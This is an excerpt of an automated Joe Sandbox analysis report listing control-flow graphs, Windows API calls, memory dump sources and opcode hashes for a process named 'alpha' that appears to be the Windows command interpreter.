                                                                                          • 760 7ff6a0e83dd3-7ff6a0e83ddd 758->760
                                                                                          • 763 7ff6a0e83ff1-7ff6a0e84007 call 7ff6a0e8855c _local_unwind 759->763
                                                                                          • 762 7ff6a0e83de3-7ff6a0e83dfb 760->762 760->763
                                                                                          • 765 7ff6a0e83e01-7ff6a0e83e11 762->765
                                                                                          • 766 7ff6a0e840fe-7ff6a0e84119 call 7ff6a0e8855c _local_unwind 762->766
                                                                                          • 774 7ff6a0e8400c-7ff6a0e84022 GetLastError 763->774 765->766
                                                                                          • 770 7ff6a0e83e17-7ff6a0e83e28 765->770
                                                                                          • 775 7ff6a0e8411a-7ff6a0e8412c call 7ff6a0e7ff70 call 7ff6a0e8855c 766->775
                                                                                          • 773 7ff6a0e83e2c-7ff6a0e83e34 770->773 773->773
                                                                                          • 776 7ff6a0e83e36-7ff6a0e83e3f 773->776
                                                                                          • 777 7ff6a0e84028-7ff6a0e8402b 774->777
                                                                                          • 778 7ff6a0e83e95-7ff6a0e83e9c 774->778 775->738
                                                                                          • 782 7ff6a0e83e42-7ff6a0e83e55 776->782 777->778
                                                                                          • 783 7ff6a0e84031-7ff6a0e84047 call 7ff6a0e8855c _local_unwind 777->783
                                                                                          • 779 7ff6a0e83ecf-7ff6a0e83ed3 778->779
                                                                                          • 780 7ff6a0e83e9e-7ff6a0e83ec2 call 7ff6a0e82978 778->780
                                                                                          • 785 7ff6a0e83f08-7ff6a0e83f0b 779->785
                                                                                          • 786 7ff6a0e83ed5-7ff6a0e83ef7 GetFileAttributesW 779->786
                                                                                          • 792 7ff6a0e83ec7-7ff6a0e83ec9 780->792
                                                                                          • 788 7ff6a0e83e57-7ff6a0e83e60 782->788
                                                                                          • 789 7ff6a0e83e66-7ff6a0e83e8f GetFileAttributesW 782->789
                                                                                          • 799 7ff6a0e8404c-7ff6a0e84062 call 7ff6a0e8855c _local_unwind 783->799
                                                                                          • 796 7ff6a0e83f0d-7ff6a0e83f11 785->796
                                                                                          • 797 7ff6a0e83f1e-7ff6a0e83f40 SetCurrentDirectoryW 785->797
                                                                                          • 793 7ff6a0e83efd-7ff6a0e83f02 786->793
                                                                                          • 794 7ff6a0e84067-7ff6a0e84098 GetLastError call 7ff6a0e8855c _local_unwind 786->794 788->789
                                                                                          • 798 7ff6a0e83f9d-7ff6a0e83fa5 788->798 789->774 789->778 792->779 792->799 793->785
                                                                                          • 801 7ff6a0e8409d-7ff6a0e840b3 call 7ff6a0e8855c _local_unwind 793->801 794->801
                                                                                          • 803 7ff6a0e83f46-7ff6a0e83f69 call 7ff6a0e8498c 796->803
                                                                                          • 804 7ff6a0e83f13-7ff6a0e83f1c 796->804 797->803
                                                                                          • 805 7ff6a0e840b8-7ff6a0e840de GetLastError call 7ff6a0e8855c _local_unwind 797->805 798->782 799->794 801->805
                                                                                          • 815 7ff6a0e840e3-7ff6a0e840f9 call 7ff6a0e8855c _local_unwind 803->815
                                                                                          • 816 7ff6a0e83f6f-7ff6a0e83f98 call 7ff6a0e8417c 803->816 804->797 804->803 805->815 815->766 816->775
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                          • String ID: :
                                                                                          • API String ID: 1809961153-336475711
                                                                                          • Opcode ID: 9a6838553337d10caea9482eb8d4b87fb6c3f53a5735761c353ac2a4c5941523
                                                                                          • Instruction ID: b8a44fdce79a4800a4894f883ad31d0925d64bf8fe5ab330c41f98648fe6d147
                                                                                          • Opcode Fuzzy Hash: 9a6838553337d10caea9482eb8d4b87fb6c3f53a5735761c353ac2a4c5941523
                                                                                          • Instruction Fuzzy Hash: 81D15272B0EB87A1EA64DB25E4542BAB7A1FF84740F444136EA4E837A5DF3CE548D700

                                                                                          Control-flow Graph

                                                                                          • 914 7ff6a0e82394-7ff6a0e82416 memset call 7ff6a0e7ca40
                                                                                          • 917 7ff6a0e8241c-7ff6a0e82453 GetModuleFileNameW call 7ff6a0e8081c 914->917
                                                                                          • 918 7ff6a0e8e0d2-7ff6a0e8e0da call 7ff6a0e84c1c 914->918
                                                                                          • 923 7ff6a0e82459-7ff6a0e82468 call 7ff6a0e8081c 917->923
                                                                                          • 924 7ff6a0e8e0db-7ff6a0e8e0ee call 7ff6a0e8498c 917->924 918->924
                                                                                          • 929 7ff6a0e8e0f4-7ff6a0e8e107 call 7ff6a0e8498c 923->929
                                                                                          • 930 7ff6a0e8246e-7ff6a0e8247d call 7ff6a0e8081c 923->930 924->929
                                                                                          • 937 7ff6a0e8e10d-7ff6a0e8e123 929->937
                                                                                          • 935 7ff6a0e82516-7ff6a0e82529 call 7ff6a0e8498c 930->935
                                                                                          • 936 7ff6a0e82483-7ff6a0e82492 call 7ff6a0e8081c 930->936 935->936 936->937
                                                                                          • 947 7ff6a0e82498-7ff6a0e824a7 call 7ff6a0e8081c 936->947
                                                                                          • 940 7ff6a0e8e13f-7ff6a0e8e17a _wcsupr 937->940
                                                                                          • 941 7ff6a0e8e125-7ff6a0e8e139 wcschr 937->941
                                                                                          • 945 7ff6a0e8e181-7ff6a0e8e199 wcsrchr 940->945
                                                                                          • 946 7ff6a0e8e17c-7ff6a0e8e17f 940->946 941->940
                                                                                          • 944 7ff6a0e8e27c 941->944
                                                                                          • 948 7ff6a0e8e283-7ff6a0e8e29b call 7ff6a0e8498c 944->948
                                                                                          • 950 7ff6a0e8e19c 945->950 946->950
                                                                                          • 955 7ff6a0e824ad-7ff6a0e824c5 call 7ff6a0e83c24 947->955
                                                                                          • 956 7ff6a0e8e2a1-7ff6a0e8e2c3 _wcsicmp 947->956 948->956
                                                                                          • 953 7ff6a0e8e1a0-7ff6a0e8e1a7 950->953 953->953
                                                                                          • 957 7ff6a0e8e1a9-7ff6a0e8e1bb 953->957
                                                                                          • 963 7ff6a0e824ca-7ff6a0e824db 955->963
                                                                                          • 959 7ff6a0e8e1c1-7ff6a0e8e1e6 957->959
                                                                                          • 960 7ff6a0e8e264-7ff6a0e8e277 call 7ff6a0e81300 957->960
                                                                                          • 961 7ff6a0e8e1e8-7ff6a0e8e1f1 959->961
                                                                                          • 962 7ff6a0e8e21a 959->962 960->944
                                                                                          • 965 7ff6a0e8e201-7ff6a0e8e210 961->965
                                                                                          • 966 7ff6a0e8e1f3-7ff6a0e8e1f6 961->966
                                                                                          • 969 7ff6a0e8e21d-7ff6a0e8e21f 962->969
                                                                                          • 967 7ff6a0e824dd-7ff6a0e824e4 ??_V@YAXPEAX@Z 963->967
                                                                                          • 968 7ff6a0e824e9-7ff6a0e82514 call 7ff6a0e88f80 963->968 965->962
                                                                                          • 971 7ff6a0e8e212-7ff6a0e8e218 965->971 966->965
                                                                                          • 970 7ff6a0e8e1f8-7ff6a0e8e1ff 966->970 967->968 969->948
                                                                                          • 973 7ff6a0e8e221-7ff6a0e8e228 969->973 970->965 970->966 971->969
                                                                                          • 975 7ff6a0e8e254-7ff6a0e8e262 973->975
                                                                                          • 976 7ff6a0e8e22a-7ff6a0e8e231 973->976 975->944
                                                                                          • 977 7ff6a0e8e234-7ff6a0e8e237 976->977 977->975
                                                                                          • 978 7ff6a0e8e239-7ff6a0e8e242 977->978 978->975
                                                                                          • 979 7ff6a0e8e244-7ff6a0e8e252 978->979 979->975 979->977
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                                          • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                          • API String ID: 2622545777-4197029667
                                                                                          • Opcode ID: 9e052dd8a569df61deb78e5422594237265ab7758b060a59aba3d98d3c4be830
                                                                                          • Instruction ID: d4e3c3a7c48bde46850cd103560d19cf9a672123c12e4b060ae0efd296dd3108
                                                                                          • Opcode Fuzzy Hash: 9e052dd8a569df61deb78e5422594237265ab7758b060a59aba3d98d3c4be830
                                                                                          • Instruction Fuzzy Hash: 9E917071B0BB83A6EF249B60D8642B967A5FF88B85F544135C90E877A5DF3CE509E300

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleMode_get_osfhandle
                                                                                          • String ID: CMD.EXE
                                                                                          • API String ID: 1606018815-3025314500
                                                                                          • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                          • Instruction ID: 13592d1b1fc6219afe5a667f5be2c6ddea4e6fd0ee6c223e246dda490559e1cc
                                                                                          • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                          • Instruction Fuzzy Hash: A141B135A0BB83ABE7544B24E855178BBA0FF8EB62F959175D90EC3361DF3CA404A710

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleTitlewcschr
                                                                                          • String ID: /$:
                                                                                          • API String ID: 2364928044-4222935259
                                                                                          • Opcode ID: 8e1374b0c85c3997ae108a920788d038497e0ecf6712f1d7bde5348e2c3bef55
                                                                                          • Instruction ID: e06543d5bb5c77c09212426f39243cc197a4159596bddd93863e3cde5feb2424
                                                                                          • Opcode Fuzzy Hash: 8e1374b0c85c3997ae108a920788d038497e0ecf6712f1d7bde5348e2c3bef55
                                                                                          • Instruction Fuzzy Hash: 91C1D172E0A643A1FA689B25D4143B962A5FF85B90F448139DA1EC73D2EF3CE845F700

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                          • String ID:
                                                                                          • API String ID: 4291973834-0
                                                                                          • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                          • Instruction ID: 7e78bba95abaca0db11812cda2f2204c227f555a0537cf74ebf385dc65f9b8f2
                                                                                          • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                          • Instruction Fuzzy Hash: 2841D831E0E687A6F7549B10EA4027562B1BF58346F644436E95EC77A0DF7CE848E740

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                          • String ID:
                                                                                          • API String ID: 850181435-0
                                                                                          • Opcode ID: e1379ede723eac65afdf39bc4f10c7cd7bacbf823c50ad72477e63a898fb5baf
                                                                                          • Instruction ID: 3581676da88748d104d0f941d65adfd7c04153bab424961cd1bb198314b1ec49
                                                                                          • Opcode Fuzzy Hash: e1379ede723eac65afdf39bc4f10c7cd7bacbf823c50ad72477e63a898fb5baf
                                                                                          • Instruction Fuzzy Hash: 2D418E32609BC2DAE7708F20D8442E9B7B4FB89B45F544135DA4D8BB48CF38D549D700

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A28
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A66
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A7D
                                                                                          • memmove.MSVCRT(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A9A
                                                                                          • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84AA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                                          • String ID:
                                                                                          • API String ID: 1623332820-0
                                                                                          • Opcode ID: bedbd02b2e83685aab04dae624747bec3d3f04209153fba6c5d2bef1ca8d2a3e
                                                                                          • Instruction ID: 6c5731bd2cf5a4169009e10ca608cd6828d385bd8f221c788b61ab3c621e1308
                                                                                          • Opcode Fuzzy Hash: bedbd02b2e83685aab04dae624747bec3d3f04209153fba6c5d2bef1ca8d2a3e
                                                                                          • Instruction Fuzzy Hash: 6A119E72A1AB4392DE149B62A404039BBE0FB8DF81F599039EE4E47784EE3DE8459740
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                          • String ID:
                                                                                          • API String ID: 1826527819-0
                                                                                          • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                          • Instruction ID: 69c79ed524f9bf397835da6ba45d2db6a92f5ad21214e85c9dd1ea16f9ba29c4
                                                                                          • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                          • Instruction Fuzzy Hash: 8E016D3190A683AAE6005B24A4441B9BBB1FF8E752F545134E54F823A6DF3C94489700
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E81EA0: wcschr.MSVCRT(?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF6A0EA0D54), ref: 00007FF6A0E81EB3
                                                                                          • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF6A0E792AC), ref: 00007FF6A0E830CA
                                                                                          • SetErrorMode.KERNELBASE ref: 00007FF6A0E830DD
                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E830F6
                                                                                          • SetErrorMode.KERNELBASE ref: 00007FF6A0E83106
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorMode$FullNamePathwcschr
                                                                                          • String ID:
                                                                                          • API String ID: 1464828906-0
                                                                                          • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                          • Instruction ID: 140ac910e9a6dbf823169bb0a3f970008de1033b6731bafc0565a9932178de45
                                                                                          • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                          • Instruction Fuzzy Hash: 80311332E0A613A6E7649F25A41417EB6A0FB49B94F548235DA5EC33D0DE7DE889A300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset
                                                                                          • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                          • API String ID: 2221118986-3416068913
                                                                                          • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                          • Instruction ID: 2b5cc85fcd3459605485be03ade3b720bdfcbd23ed7fc71a2e120c4f08da3648
                                                                                          • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                          • Instruction Fuzzy Hash: 0311E931B0A74791EB54CB65E1442B912A0BF89BE4F184335DE6ECB3D6DE3CD480A300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memsetwcschr
                                                                                          • String ID: 2$COMSPEC
                                                                                          • API String ID: 1764819092-1738800741
                                                                                          • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                          • Instruction ID: 7ed1a9f6bfa0e649fccef473a754143f2ea7bf535b9cc905f3fbb0799120d66a
                                                                                          • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                          • Instruction Fuzzy Hash: 8D516A32F0A64BA5FB789B25A8413B92295FF85B84F084036DA4DC67D7DF2CE844A741
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                          • String ID:
                                                                                          • API String ID: 4254246844-0
                                                                                          • Opcode ID: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                                                          • Instruction ID: 219f492d9f4d3db341910247ff5263064da078a242de427b056eb6b59c452005
                                                                                          • Opcode Fuzzy Hash: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
